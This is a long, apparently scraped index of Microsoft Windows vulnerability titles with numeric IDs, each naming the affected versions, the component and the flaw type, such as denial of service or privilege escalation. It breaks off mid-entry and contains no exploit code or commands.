Microsoft Windows NT 4.0 SNMP Agent snmp.exe denial of service [14041] Microsoft Windows 95/NT 4.0 TCP SYN Teardrop2 denial of service [14040] Microsoft Windows 95/NT 3.51/NT 4.0 TCP SYN Teardrop denial of service [14031] Microsoft Windows 95/NT 4.0 TCP SYN Country denial of service [13992] Microsoft Windows WINS denial of service [13940] Microsoft Windows up to NT 4.0 SP2 IP Fragmentation privilege escalation [13924] Microsoft Windows up to NT 4.0 NetBIOS WinNuke denial of service [13911] Microsoft Windows NT 4.0 DNS Server denial of service [13873] Microsoft Windows 4.0 SMB Mount denial of service [13871] Microsoft Windows NT 4.0 Winpopup denial of service [13834] Microsoft Windows NT 4.0/2000 Account Policy weak authentication [13833] Microsoft Windows NT 4.0 File Audit Policy privilege escalation [13832] Microsoft Windows NT 4.0 Audit Policy privilege escalation [13831] Microsoft Windows NT 4.0/2000 REG Files privilege escalation [13830] Microsoft Windows NT 4.0/2000 Registry privilege escalation [13828] Microsoft Windows NT 4.0/2000 Account Policy privilege escalation [13826] Microsoft Windows Traceroute privilege escalation [13824] Microsoft Windows 95/NT 4.0/2000 NetBIOS/SMB Share weak authentication [13823] Microsoft Windows 95 NetBIOS/SMB Share weak authentication [13821] Microsoft Windows NT 4.0/2000 IP Forwarding privilege escalation [13819] Microsoft Windows NT 4.0/2000 Password Authentication weak authentication [13817] Microsoft Windows NT 4.0/2000 SNMP Registry Key information disclosure [13815] Microsoft Windows 95/NT 4.0 ICMP Jolt denial of service [13814] Microsoft Windows NT 4.0 DNS Server denial of service [13802] Microsoft Windows 95/NT 3.51 Samba Share Code [13695] Microsoft Windows NT 4.0 TCP Sequence Number weak authentication [13549] Microsoft Windows 7/8/8.1/Server 2012 Remote Desktop Protocol weak encryption [13548] Microsoft Windows up to Vista TCP/IP Packet privilege escalation [13546] Microsoft Windows up to Vista XML Core Services privilege escalation [13544] Microsoft Windows up to Vista GDI+ privilege escalation [13543] Microsoft Windows up to Vista Unicode Script Processor usp10.dll memory corruption [13397] Microsoft Windows 2000/Server 2003/XP DHCP Response weak authentication [13234] Microsoft Windows iSCSI Packets privilege escalation [13233] Microsoft Windows iSCSI Packets privilege escalation [12853] Microsoft Windows up to XP SP3 Batch File CreateProcess privilege escalation [12711] Microsoft Windows Media Player 11.0.5721.5230 WAV File memory corruption [12530] Microsoft Windows Server 2003/Server 2008/Server 2012/Vista/XP Security Account Manager privilege escalation [12526] Microsoft Windows up to XP DirectShow denial of service [12264] Microsoft Windows up to XP XML Core Services privilege escalation [12263] Microsoft Windows up to Server 2012 Direct2D memory corruption [12238] Microsoft Windows 8/RT/Server 2012 IPv6 privilege escalation [11673] Microsoft Windows Live Movie Maker 2011 WAV File privilege escalation [11456] Microsoft Windows up to XP Scripting Runtime Object Library denial of service [11167] Microsoft Windows up to XP DirectAcccess Server privilege escalation [11150] Microsoft Windows 8/Server 2012 Hyper-V Data Structure Value privilege escalation [11147] Microsoft Windows up to XP X.509 Certificate Processor Crypt32.dll/Wcrypt32.dll privilege escalation [11145] Microsoft Windows up to XP Graphics Device Interface Numeric Error [11081] Microsoft Windows Server 2008/Vista TIFF Image privilege escalation [11004] Microsoft Windows Server 2012 R2 RDP Restricted Admin Mode weak authentication [10641] Microsoft Windows up to XP Comctl32.dll DSA_InsertItem denial of service [10638] Microsoft Windows up to XP TrueType Font privilege escalation [10632] Microsoft Windows up to XP OpenType Font privilege escalation [10192] Microsoft Windows 7/2000/Server 2003 SP2/Vista/XP SP3 Windows Theme File privilege escalation [10191] Microsoft Windows Server 2003/XP OLE Object memory corruption [10190] Microsoft Windows 7/8/Server 2008/Vista Active Directory privilege escalation [9944] Microsoft Windows up to XP TCP/IP Stack memory corruption [9943] Microsoft Windows Server 2012 NAT Driver memory corruption [9941] Microsoft Windows Server 2003/XP Unicode Scripts Processor USP10.DLL memory corruption [9929] Microsoft Windows Server 2008/Server 2012 Active Directory Federation Services information disclosure [9423] Microsoft Windows Microsoft WMV Codec privilege escalation [9422] Microsoft Windows GIF DirectShow privilege escalation [9398] Microsoft Windows up to XP TTF privilege escalation [9103] Microsoft Windows TCP/IP Driver Numeric Error [8739] Microsoft Windows Essentials up to 2012 Windows Writer privilege escalation [8722] Microsoft Windows 8/RT/Server 2012 HTTP.sys memory corruption [8208] Microsoft Windows win32k.sys privilege escalation [8207] Microsoft Windows win32k.sys race condition [8203] Microsoft Windows up to 2012 AD LDAP Query privilege escalation [8095] Microsoft Windows Modern Mail weak authentication [7996] Microsoft Windows 8 TrueType Font denial of service [7680] Microsoft Windows XP SP3 Object Linking/Embedding denial of service [7678] Microsoft Windows up to XP TCP FIN WAIT TCP/IP denial of service [7644] Microsoft Windows up to XP .NET Framework callback privilege escalation [7643] Microsoft Windows Server 2008 R2/Server 2012 NFS Server denial of service [7641] Microsoft Windows Server 2003/Server 2008/Vista/XP DirectShow Quartz.dll privilege escalation [7258] Microsoft Windows up to 8/Server 2012 SSL/TLS privilege escalation [7248] Microsoft Windows 7/Server 2008 R2 Print Spooler memory corruption [7233] Microsoft Windows up to XP SP3 TURKTRUST Certificate weak authentication [7128] Microsoft Windows up to XP Font Parser privilege escalation [7123] Microsoft Windows up to XP Font Parser privilege escalation [7118] Microsoft Windows Server 2008 R2/Server 2012 IP-HTTPS privilege escalation [7058] Microsoft Windows 7/Server 2008 R2 DHCPv6 Message denial of service [6932] Microsoft Windows up to XP win32k.sys denial of service [6931] Microsoft Windows up to XP win32k.sys denial of service [6923] Microsoft Windows up to XP Briefcase Numeric Error [6922] Microsoft Windows up to XP Briefcase denial of service [6627] Microsoft Windows 7/Server 2008 R2 Kerberos denial of service [6525] Microsoft Windows Phone 7 Certificate Subject Common Name weak encryption [6029] Microsoft Windows up to XP MS-CHAP V2 Authentication weak encryption [5942] Microsoft Windows XP Remote Desktop Protocol memory corruption [5941] Microsoft Windows XP Remote Administration Protocol memory corruption [5940] Microsoft Windows XP Remote Administration Protocol memory corruption [5939] Microsoft Windows 7/Server 2003/Server 2008 R2/Vista/XP Print Spooler Service Format String [5938] Microsoft Windows 7/Server 2003/Server 2008 R2/Vista/XP Remote Administration Protocol netapi32.dll privilege escalation [5663] Microsoft Windows 7/Vista Gadgets memory corruption [5654] Microsoft Windows 7/Server 2003/Server 2008/Vista/XP information disclosure [5653] Microsoft Windows 7/Server 2003/Server 2008/Vista/XP win32k.sys privilege escalation [5652] Microsoft Windows 7/Server 2003/Server 2008/Vista/XP win32k.sys privilege escalation [5650] Microsoft Windows 7/Server 2003/Server 2008/Vista/XP privilege escalation [5553] Microsoft Windows 7/Server 2003/Server 2008/Vista/XP OpenType Font atmfd.dll denial of service [5524] Microsoft Windows 7/Server 2003/Server 2008/Vista/XP privilege escalation [5361] Microsoft Windows privilege escalation [5359] Microsoft Windows XP t2embed.dll denial of service [5358] Microsoft Windows 7/Server 2003/Server 2008/Vista/XP TrueType Font Handling memory corruption [5046] Microsoft Windows 7/Server 2003/Server 2008/Vista/XP Windows Authenticode Signature Verification privilege escalation [4803] Microsoft Windows Server 2003/Server 2008 DNS Server Domain Resource Record Query Parser denial of service [4802] Microsoft Windows 7/Server 2003/Server 2008/Vista/XP Remote Desktop Protocol privilege escalation [4798] Microsoft Windows 7/Server 2003/Server 2008/Vista/XP Remote Desktop Service privilege escalation [4546] Microsoft Windows NT Ntdll.dll unknown vulnerability [4535] Microsoft Windows Server 2003/XP Object Packager packager.exe privilege escalation [4534] Microsoft Windows 7/Server 2003/Server 2008/Vista/XP Line21 DirectShow Filter Quartz.dll/Qdvd.dll memory corruption [4533] Microsoft Windows 7/Server 2003/Server 2008/Vista/XP Multimedia Library winmm.dll memory corruption [4532] Microsoft Windows Embedded ClickOnce Application memory corruption [4484] Microsoft Windows Phone 7.5 SMS Service weak encryption [4481] Microsoft Windows Media Player ENCDEC.DLL privilege escalation [4478] Microsoft Windows Server 2003/XP OLE Objects Memory Management privilege escalation [4474] Microsoft Windows 7/Server 2003/Server 2008/Vista/XP Active Directory Query memory corruption [4458] Microsoft Windows Apple Safari win32k.sys privilege escalation [4455] Microsoft Windows XP Keyboard Layout win32k.sys denial of service [4452] Microsoft Windows Adctive Directory Query memory corruption [4451] Microsoft Windows Kernel Exception privilege escalation [4450] Microsoft Windows OLE Objects Property privilege escalation [4449] Microsoft Windows CSRSS Device Event Message privilege escalation [4448] Microsoft Windows 7/Vista/XP Media DVR-MS Parser privilege escalation [4447] Microsoft Windows Time ActiveX Control privilege escalation [4440] Microsoft Windows Active Directory weak authentication [4439] Microsoft Windows True Type Fonts privilege escalation [4438] Microsoft Windows 7/Server 2008/Vista TCP/IP Reference Counter Numeric Error [4436] Microsoft Windows True Type Fonts win32k.sys memory corruption [4431] Microsoft Windows SSL/TLS IV privilege escalation [4422] Microsoft Windows Driver win32k.sys memory corruption [4421] Microsoft Windows Ancillary Function Driver privilege escalation [4410] Microsoft Windows Library Loader privilege escalation [4409] Microsoft Windows Server 2003/Server 2008 WINS privilege escalation [4396] Microsoft Windows 7/Server 2008/Vista TCP/IP Stack denial of service [4395] Microsoft Windows Client/Server Run-Time Subsystem privilege escalation [4394] Microsoft Windows DNS Service Domain Lookup memory corruption [4393] Microsoft Windows Server 2008 DNS Service privilege escalation [4392] Microsoft Windows Remote Access Service privilege escalation [4390] Microsoft Windows Server 2008 Remote Desktop Web Access cross site scripting [4389] Microsoft Windows Remote Desktop Protocol denial of service [4388] Microsoft Windows 7/Server 2008/Vista File Metadata Parser denial of service [4386] Microsoft Windows XP denial of service [4382] Microsoft Windows CSRSS memory corruption [4381] Microsoft Windows 7/Vista Bluetooth Driver Object privilege escalation [4380] Microsoft Windows Driver win32k.sys denial of service [4373] Microsoft Windows MHTML cross site scripting [4371] Microsoft Windows Distributed File System memory corruption [4367] Microsoft Windows Server 2008 Hyper-V VMBus denial of service [4366] Microsoft Windows OLE Automatisation Numeric Error [4365] Microsoft Windows OpenType Font privilege escalation [4364] Microsoft Windows Active Directory cross site scripting [4363] Microsoft Windows SMB Client privilege escalation [4362] Microsoft Windows 7/Server 2008/Vista denial of service [4361] Microsoft Windows Ancillary Function Driver privilege escalation [4347] Microsoft Windows WINS Service privilege escalation [4339] Microsoft Windows JScript/VBScript Numeric Error [4338] Microsoft Windows DNS privilege escalation [4337] Microsoft Windows OpenType Font memory corruption [4336] Microsoft Windows Driver win32k.sys denial of service [4335] Microsoft Windows GDI+ Numeric Error [4333] Microsoft Windows Wordpad privilege escalation [4331] Microsoft Windows SMB Transaction Parser privilege escalation [4314] Microsoft Windows DirectShow/Windows Media privilege escalation [4313] Microsoft Windows Remote Desktop Client privilege escalation [4301] Microsoft Windows Server 2003 SMB Browser memory corruption [4298] Microsoft Windows 7/Server 2008 JScript/VBScript Engine information disclosure [4297] Microsoft Windows 7/Server 2003/Server 2008/Vista/XP OpenType Compact Font Format Driver privilege escalation [4296] Microsoft Windows Server 2003/XP LSASS weak authentication [4295] Microsoft Windows 7/Server 2008 Kerberos weak authentication [4294] Microsoft Windows 7/Server 2003/Server 2008/Vista/XP Driver win32k.sys privilege escalation [4293] Microsoft Windows Server 2003/XP Kerberos CRC32 Checksum weak encryption [4292] Microsoft Windows Server 2003/XP CSRSS Logoff privilege escalation [4279] Microsoft Windows 7/Server 2003/Server 2008/Vista/XP MHTML cross site scripting [4238] Microsoft Windows Data Access Components Numeric Error [4237] Microsoft Windows Thumbnail Bitmap Parser memory corruption [4235] Microsoft Windows Fax Cover Page Editor memory corruption [4233] Microsoft Windows privilege escalation [4231] Microsoft Windows 7/Server 2003/Server 2008/Vista/XP Driver win32k.sys GreEnableEUDC memory corruption [4230] Microsoft Exchange 2007 on 64-bit RPC store.exe denial of service [4228] Microsoft Windows Server 2008 Hyper-V VMBus privilege escalation [4226] Microsoft Windows OpenType Font Driver privilege escalation [4225] Microsoft Windows Routing/Remote Access NDProxy memory corruption [4224] Microsoft Windows 7/Server 2008/Vista Consent User Interface privilege escalation [4207] Microsoft Windows Keyboard Layout win32k.sys memory corruption [4204] Microsoft Windows Server 2008 Color Control Panel unknown vulnerability [4202] Microsoft Windows Keyboard Layout win32k.sys Windows Class privilege escalation [4201] Microsoft Windows OpenType Font Parser Numeric Error [4198] Microsoft Windows Shell/Wordpad privilege escalation [4195] Microsoft Windows Integer Truncation Common Control Library memory corruption [4194] Microsoft Windows 7/Server 2008/Vista SChannel Client privilege escalation [4193] Microsoft Windows OpenType Font Parser privilege escalation [4192] Microsoft Windows LPC Message memory corruption [4187] Microsoft Windows 7/Server 2008/Vista TCP/IP Stack Ipv4SetEchoRequestCreate denial of service [4185] Microsoft Windows Client/Server Run-Time Subsystem privilege escalation [4184] Microsoft Windows LSASS memory corruption [4183] Microsoft Windows Unicode Script Processor privilege escalation [4182] Microsoft Windows MPEG-4 Codec Content Parser privilege escalation [4166] Microsoft Windows SMB Server privilege escalation [4165] Microsoft Windows 7/Server 2008/Vista TCP/IP Stack memory corruption [4162] Microsoft Windows 7/Server 2008/Vista Kernel race condition [4161] Microsoft Windows TLS/SSL Session weak encryption [4158] Microsoft Windows Driver win32k.sys CreateDIBPalette memory corruption [4152] Microsoft Windows MFC Document Title Updating memory corruption [4151] Microsoft Windows Server 2008/Vista NtUserCheckAccessForIntegrityLevel denial of service [4149] Microsoft Windows 7/Server 2003/Server 2008/Vista/XP Shell Shortcut Parser privilege escalation [4139] Microsoft Windows Help/Support Center privilege escalation [4136] Microsoft Windows Media Decompression privilege escalation [4135] Microsoft Windows Kernel Mode Driver privilege escalation [4134] Microsoft Windows OpenType Compact Font Format Driver privilege escalation [4126] Microsoft Windows Mail STAT Numeric Error [4107] Microsoft Windows 7/Server 2008 Kernel privilege escalation [4105] Microsoft Windows SMB Client denial of service [4104] Microsoft Windows SMTP Service privilege escalation [4103] Microsoft Windows Server 2003 Media Services memory corruption [4102] Microsoft Windows Authentication Verification privilege escalation [4101] Microsoft Windows ISATAP privilege escalation [4100] Microsoft Windows MPEG Layer-3 Codec memory corruption [4089] Microsoft Windows Movie Maker memory corruption [4088] Microsoft Windows HLP File MsgBox privilege escalation [4087] Microsoft Windows DirectShow memory corruption [4086] Microsoft Windows CSRSS privilege escalation [4085] Microsoft Windows SMB Client privilege escalation [4084] Microsoft Windows Shell privilege escalation [4083] Microsoft Windows Paint Numeric Error [4076] Microsoft Windows Embedded OpenType Font Engine Numeric Error [4070] Microsoft Windows Indeo Codec memory corruption [4068] Microsoft Windows MS-CHAP Authentication privilege escalation [4067] Microsoft Windows Active Directory Federation Service privilege escalation [4066] Microsoft Windows Local Security Authority Subsystem denial of service [4060] Microsoft Windows Win32k Kernel Mode Driver privilege escalation [4058] Microsoft Windows Active Directory denial of service [4051] Microsoft Windows GDI+ privilege escalation [4050] Microsoft Windows ActiveX Control memory corruption [4049] Microsoft Windows ActiveX Controls ATL OleLoadFromStream privilege escalation [4044] Microsoft Windows Media Runtime privilege escalation [4031] Microsoft Windows Server 2008/Vista SMB Processor EducatedScholar denial of service [4030] Microsoft Windows Server 2008/Vista Wireless LAN AutoConfig Service memory corruption [4029] Microsoft Windows 2000/XP TCP/IP Window Size denial of service [4028] Microsoft Windows ASF/MP3 Media privilege escalation [4026] Microsoft Windows DHTML Editing ActiveX Control privilege escalation [4025] Microsoft Windows privilege escalation [4016] Microsoft Windows Remote Desktop Connection memory corruption [4014] Microsoft Windows Workstation Service denial of service [4013] Microsoft Windows Message Queuing Service privilege escalation [4012] Microsoft Windows WINS Service Numeric Error [4011] Microsoft Windows WINS Service memory corruption [4010] Microsoft Windows AVI Movie privilege escalation [4001] Microsoft Windows DirectShow memory corruption [3998] Microsoft Windows Embedded OpenType Font Engine memory corruption [3997] Microsoft Windows Embedded OpenType Font Engine Numeric Error [3990] Microsoft Windows Print Spooler memory corruption [3989] Microsoft Windows Print Spooler memory corruption [3988] Microsoft Windows Print Spooler EnumeratePrintShares memory corruption [3979] Microsoft Windows DirectShow memory corruption [3960] Microsoft Windows 2000/Server 2003/XP DirectShow MJPEG privilege escalation [3950] Microsoft Windows HTTP Service Numeric Error [3939] Microsoft Windows 2000 DNS privilege escalation [3938] Microsoft Windows 2000 SSL weak authentication [3937] Microsoft Windows 2000 privilege escalation [3895] Microsoft Windows GDI Image Parser memory corruption [3894] Microsoft Windows GDI Image Parser Numeric Error [3893] Microsoft Windows WordPad denial of service [3866] Microsoft Windows SMB Authentication weak authentication [3860] Microsoft Windows Path Canonicalisation EclipsedWing privilege escalation [3853] Microsoft Windows Ancillary Function Driver privilege escalation [3852] Microsoft Windows SMB memory corruption [3851] Microsoft Windows IIS IPP Service Numeric Error [3850] Microsoft Windows privilege escalation [3849] Microsoft Windows denial of service [3846] Microsoft Windows privilege escalation [3845] Microsoft Windows 2000 SP4 Active Directory denial of service [3822] Microsoft Windows GDI+ BMP Image Numeric Error [3821] Microsoft Windows GDI+ WMF File Numeric Error [3820] Microsoft Windows GDI+ GIF Image Numeric Error [3819] Microsoft Windows GDI+ EMF File Numeric Error [3818] Microsoft Windows GDI+ Numeric Error [3812] Microsoft Windows Vista Bitlocker Password Output information disclosure [3806] Microsoft Windows Color Management memory corruption [3797] Microsoft Windows Server 2008/Vista IPsec Policy information disclosure [3777] Microsoft Windows Server 2008/Vista SP1 Explorer privilege escalation [3733] Microsoft Windows Active Directory privilege escalation [3732] Microsoft Windows 2000/Server 2003 WINS privilege escalation [3730] Microsoft Windows Vista/XP privilege escalation [3699] Microsoft Windows CE Image privilege escalation [3686] Microsoft Windows privilege escalation [3675] Microsoft Windows Kernel privilege escalation [3674] Microsoft Windows ActiveX Control hxvz.dll privilege escalation [3673] Microsoft Windows memory corruption [3672] Microsoft Windows GDI WMF Color Depth memory corruption [3603] Microsoft Windows NT 4.0/2000/XP/Vista OLE Automation privilege escalation [3542] Microsoft Windows LSASS privilege escalation [3541] Microsoft Windows ICMP Fragmentation memory corruption [3540] Microsoft Windows IGMPv3/MLDv2 memory corruption [3505] Microsoft Windows Vista Kernel Legacy Reply Path Validator privilege escalation [3504] Microsoft Windows Message Queue memory corruption [3500] Microsoft Windows Vista SMBv2 Signing privilege escalation [3372] Microsoft Windows SharePoint Services cross site scripting [3368] Microsoft Windows up to Vista NNTP Response memory corruption [3367] Microsoft Windows Kodak Image Viewer privilege escalation [3302] Microsoft Windows Services for UNIX privilege escalation [3253] Microsoft Windows OLE Automation substringData memory corruption [3242] Microsoft Windows VML Vector Markup Language memory corruption [3223] Microsoft Windows Server 2003/XP URI privilege escalation [3179] Microsoft Windows Active Directory denial of service [3178] Microsoft Windows Active Directory memory corruption [3177] Microsoft Windows Vista Firewall Teredo unknown vulnerability [3128] Microsoft Windows Win32 API memory corruption [3012] Microsoft Windows 2000/Server 2003 DNS Service memory corruption [3005] Microsoft Windows XP memory corruption [3004] Microsoft Windows up to 2003/XP URL Parser memory corruption [2991] Microsoft Windows Vista ATI Radeon Kernel Mode Driver denial of service [2990] Microsoft Windows 2000/Vista/XP Animated Cursor memory corruption [2933] Microsoft Windows 2000 SP4/Server 2003 SP1/XP SP2 OLE Dialog privilege escalation [2932] Microsoft Windows Malware Protection Engine Integer Coercion Error [2925] Microsoft Windows HTML Help ActiveX Control memory corruption [2811] Microsoft Windows 2000/Server 2003/XP VML Vector Markup Language Integer Coercion Error [2788] Microsoft Windows up to Vista CSRSS WINSRV.DLL MessageBox memory corruption [2739] Microsoft Windows 2000 Remote Installation Service unknown vulnerability [2738] Microsoft Windows 2000/Server 2003/XP SNMP memory corruption [2737] Microsoft Windows Server 2003/XP Manifest privilege escalation [2724] Microsoft Windows up to 10 Media Player memory corruption [2717] Microsoft Windows 2000 Print Spooler denial of service [2689] Microsoft Windows up to 2000 SP4 Active Directory denial of service [2688] Microsoft Windows 2000/Server 2003/XP Client Service for Netware denial of service [2687] Microsoft Windows 2000/Server 2003/XP Agent ActiveX Numeric Error [2686] Microsoft Windows 2000/Server 2003/XP Client Service for Netware memory corruption [2684] Microsoft Windows 2000/XP Workstation Service memory corruption [2659] Microsoft Windows 2000/XP GDI memory corruption [2655] Microsoft Windows 2000/Server 2003/XP XML Core Services memory corruption [2640] Microsoft Windows XP Windows NAT Helper Component ipnathlp.dll denial of service [2601] Microsoft Windows Server 2003/XP IPv6 Stack denial of service [2600] Microsoft Windows Server 2003/XP IPv6 Stack TCP weak encryption [2599] Microsoft Windows Server 2003/XP IPv6 Stack ICMP weak encryption [2598] Microsoft Windows Server 2003/XP Object Packager privilege escalation [2522] Microsoft Windows 2000/Server 2003/XP Indexing Service cross site scripting [2520] Microsoft Windows XP Pragmatic General Multicast privilege escalation [2436] Microsoft Windows 2000/Server 2003/XP Kernel memory corruption [2435] Microsoft Windows 2000/Server 2003/XP Exception memory corruption [2434] Microsoft Windows 2000/Server 2003/XP Winlogon privilege escalation [2433] Microsoft Windows 2000 Management Console cross site scripting [2432] Microsoft Windows 2000/Server 2003/XP DNS Resolver memory corruption [2431] Microsoft Windows 2000/Server 2003/XP Winsock API memory corruption [2426] Microsoft Windows 2000/Server 2003/XP WMF File gdi32.dll denial of service [2415] Microsoft Windows 2000/Server 2003/XP SMB File srv.sys privilege escalation [2370] Microsoft Windows 2000/Server 2003/XP Server Protocol Driver memory corruption [2369] Microsoft Windows 2000/Server 2003/XP Server Service Mailslot memory corruption [2366] Microsoft Windows 2000/Server 2003/XP DHCP Client memory corruption [2311] Microsoft Windows 2000/Server 2003/XP MRXSMB.SYS MRxSmbCscIoctlOpenForCopyChunk privilege escalation [2309] Microsoft Windows 2000/Server 2003/XP Routing/Remote Access Service memory corruption [2307] Microsoft Windows 2000/Server 2003/XP JScript Object memory corruption [2306] Microsoft Windows 2000/Server 2003/XP IP Source Routing memory corruption [2305] Microsoft Windows Server 2003/XP ART Image memory corruption [2295] Microsoft Windows 9/10 Media Player memory corruption [2275] Microsoft Windows Server 2003/XP mhtml URI inetcomm.dll memory corruption [2221] Microsoft Windows 2000/XP CHM Archive itss.dll memory corruption [2218] Microsoft Windows 2000/Server 2003/XP MSDTC memory corruption [2147] Microsoft Windows 2000/Server 2003/XP COM Object memory corruption [2054] Microsoft Windows up to 10 Media Player memory corruption [2051] Microsoft Windows Server 2003/XP Web Client Service memory corruption [2050] Microsoft Windows Server 2003/XP TCP/IP IGMP memory corruption [2049] Microsoft Windows 2000/Server 2003/XP Media Player memory corruption [2036] Microsoft Windows Server 2003/XP Service privilege escalation [1962] Microsoft Windows 2000/Server 2003/XP Web Fonts memory corruption [1934] Microsoft Windows Server 2003/XP WMF File privilege escalation [1917] Microsoft Windows NT 4.0/2000 unknown vulnerability [1909] Microsoft Windows up to XP SP1 UPnP GetDeviceList denial of service [1876] Microsoft Windows 2000/XP WMF/EMF File Integer Coercion Error [1801] Microsoft Windows 2000/Server 2003/XP Client Service for Netware memory corruption [1798] Microsoft Windows 2000/Server 2003/XP Transaction Internet Protocol denial of service [1797] Microsoft Windows 2000/Server 2003/XP COM+ memory corruption [1796] Microsoft Windows 2000/Server 2003/XP Distributed Transaction Coordinator memory corruption [1793] Microsoft Windows 2000/Server 2003/XP Explorer HTML Preview cross site scripting [1792] Microsoft Windows 2000/Server 2003/XP lnk File memory corruption [1791] Microsoft Windows 2000/Server 2003/XP lnk File memory corruption [1789] Microsoft Windows 2000/Server 2003/XP Plug-and-Play Service memory corruption [1781] Microsoft Windows XP Wireless Zero Configuration WZCQueryInterface unknown vulnerability [1726] Microsoft Windows XP SP2 unknown vulnerability [1692] Microsoft Windows up to Server 2003 Print Spooler memory corruption [1691] Microsoft Windows 2000/Server 2003/XP Kerberos memory corruption [1690] Microsoft Windows 2000/Server 2003/XP Kerberos denial of service [1689] Microsoft Windows up to Server 2003 Plug-and-Play Service memory corruption [1687] Microsoft Windows up to XP Telephony Application Programming Interface memory corruption [1653] Microsoft Windows up to XP USB Driver memory corruption [1623] Microsoft Windows 2000/XP Network Connectivity netman.dll denial of service [1621] Microsoft Windows up to XP SP2 Kernel denial of service [1596] Microsoft Windows 95/98/2000/Server 2003/XP Color Management memory corruption [1570] Microsoft Windows 2000/Server 2003/XP SMB memory corruption [1569] Microsoft Windows Server 2003/XP Web Client Service memory corruption [1568] Microsoft Windows 2000/Server 2003/XP Agent Internet Content cross site scripting [1567] Microsoft Windows 2000/Server 2003/XP HTML Help Input memory corruption [1547] Microsoft Windows 2000/Server 2003/XP Remote Desktop mstlsapi.dll weak authentication [1411] Microsoft Windows up to XP SP2 Image denial of service [1407] Microsoft Windows 2000 Web View webvw.dll memory corruption [1358] Microsoft Windows 2000/Server 2003/XP CSRSS memory corruption [1357] Microsoft Windows 2000/Server 2003/XP Objekt Manager memory corruption [1356] Microsoft Windows 2000/Server 2003/XP Kernel Access memory corruption [1355] Microsoft Windows 2000/Server 2003/XP Font File memory corruption [1350] Microsoft Windows 2000/Server 2003/XP Shell MSHTA.EXE memory corruption [1328] Microsoft Windows Server 2003 Print Color Adjustment denial of service [1327] Microsoft Windows Server 2003 SMB denial of service [1291] Microsoft Windows 2000 EMF File GetEnhMetaFilePaletteEntries denial of service [1268] Microsoft Windows Server 2003/XP TCP/IP Stack denial of service [1196] Microsoft Windows up to XP/Server 2003 Drag / Drop memory corruption [1195] Microsoft Windows 98/2000/ME/XP OLE File memory corruption [1194] Microsoft Windows/Office up to XP COM File unknown vulnerability [1193] Microsoft Windows NT 4.0/2000/Server 2003 License Logging Server privilege escalation [1191] Microsoft Windows XP Hyperlink Object Library memory corruption [1190] Microsoft Windows XP Named Pipe Connection memory corruption [1189] Microsoft Windows 2000/Server 2003/XP SMB memory corruption [1107] Microsoft Windows Server 2003/XP Indexing Service memory corruption [1088] Microsoft Windows up to XP SP2 HLP File winhlp32.exe memory corruption [1087] Microsoft Windows up to XP SP2 ANI File memory corruption [1086] Microsoft Windows up to XP SP2 LoadImage API memory corruption [1076] Microsoft Windows 9 Media Player setItemInfo privilege escalation [1075] Microsoft Windows 9 Media Player getItemInfoByAtom information disclosure [1070] Microsoft Windows XP SP2 privilege escalation [1042] Microsoft Windows up to Server 2003 HyperTerminal URL memory corruption [1041] Microsoft Windows up to XP WINS Name Validator memory corruption [1040] Microsoft Windows up to XP Local Security Authority Subsystem Service memory corruption [1039] Microsoft Windows up to XP Local Procedure Call memory corruption [1038] Microsoft Windows up to XP WordPad Word for Windows 6.0 Converter memory corruption [1037] Microsoft Windows NT 4.0 DHCP Service memory corruption [1036] Microsoft Windows NT 4.0 Server memory corruption [1011] Microsoft Windows WINS memory corruption [937] Microsoft Windows XP WAV Media File denial of service [909] Microsoft Windows NT 4.0/2000/XP ASCII Editor unknown vulnerability [908] Microsoft Windows XP JPEG ActiveX Image Control asycpict.dll denial of service [899] Microsoft Windows memory corruption [898] Microsoft Windows XP on 64-bit SMTP DNS Reply memory corruption [897] Microsoft Windows Server 2003/XP ZIP Archive dunzip32.dll memory corruption [891] Microsoft Windows memory corruption [890] Microsoft Windows denial of service [889] Microsoft Windows memory corruption [888] Microsoft Windows privilege escalation [886] Microsoft Windows denial of service [885] Microsoft Windows 2000/Server 2003/XP WebDAV XML Message denial of service [883] Microsoft Windows NT 4.0/2000/Server 2003 memory corruption [862] Microsoft Windows 2000/XP SYSTEM32 memory corruption [860] Microsoft Windows 2000/XP Packet Fragmentation denial of service [833] Microsoft Windows memory corruption [792] Microsoft Windows up to XP SP2 Internet Download cmd.exe unknown vulnerability [765] Microsoft Windows memory corruption [764] Microsoft Windows NT 4.0/2000/XP Task Scheduler containing memory corruption [763] Microsoft Windows NT 4.0/2000 POSIX Subsystem memory corruption [761] Microsoft Windows 2000 Utility Manager winhlp32.exe memory corruption [683] Microsoft Windows 2000 weak authentication [664] Microsoft Windows 2000/XP CLSID desktop.ini memory corruption [655] Microsoft Windows FTPD Sasser Worm memory corruption [637] Microsoft Windows NetBIOS Share Name memory corruption [618] Microsoft Windows Server 2003 MS04-011 Patch unknown vulnerability [610] Microsoft Windows up to XP/Server 2003 ASN.1 Library memory corruption [609] Microsoft Windows 2000/Server 2003/XP Negotiate Security Software Provider memory corruption [608] Microsoft Windows NT 4.0/2000 Virtual DOS Machine denial of service [607] Microsoft Windows NT 4.0/2000/XP Local Descriptor Table privilege escalation [606] Microsoft Windows XP Taskmanager memory corruption [605] Microsoft Windows 2000 Utility Manager memory corruption [604] Microsoft Windows Server 2003/XP Help/Support Center memory corruption [603] Microsoft Windows 2000 Metafile WMF/EMF Integer Coercion Error [602] Microsoft Windows NT 4.0/2000/XP WinLogon Domain Object memory corruption [601] Microsoft Windows up to XP/Server 2003 PCT Message memory corruption [600] Microsoft Windows 2000 Domain Controller memory corruption [599] Microsoft Windows up to Server 2003 LSASS Request memory corruption [564] Microsoft Windows XP on WinXP WMF File explorer.exe denial of service [530] Microsoft Windows XP EMF File shimgvw.dll Integer Coercion Error [518] Microsoft Windows Server 2003/XP ntdll.dll unknown vulnerability [516] Microsoft Windows up to XP SP1 BMP Image imgbmp.cxx memory corruption [509] Microsoft Windows NT 4.0/2000/XP/Server 2003 WINS Server GS privilege escalation [508] Microsoft Windows NT 4.0/2000/XP/Server 2003 ASN.1 lsass.exe Integer Coercion Error [491] Microsoft Windows XP .folder memory corruption [441] Microsoft Windows SHELL32.DLL memory corruption [414] Microsoft Windows XP BIOS Date Reset denial of service [383] Microsoft Windows 2000/XP Workstation Service memory corruption [350] Microsoft Windows 2000/NT/Server 2003/XP HTML Help memory corruption [348] Microsoft Windows XP CommCtl32.dll memory corruption [332] Microsoft Windows NT 4.0/2000/XP Messenger Service memory corruption [328] Microsoft Windows 2000 Message Queuing Service mqsvc.exe memory corruption [323] Microsoft Windows Server 2003 Shell Folder information disclosure [318] Microsoft Windows Media Player 6.4/7/7.1/9 unknown vulnerability [312] Microsoft Windows 2000/Server 2003/Vista/XP PostThreadMessage unknown vulnerability [286] Microsoft Windows Server 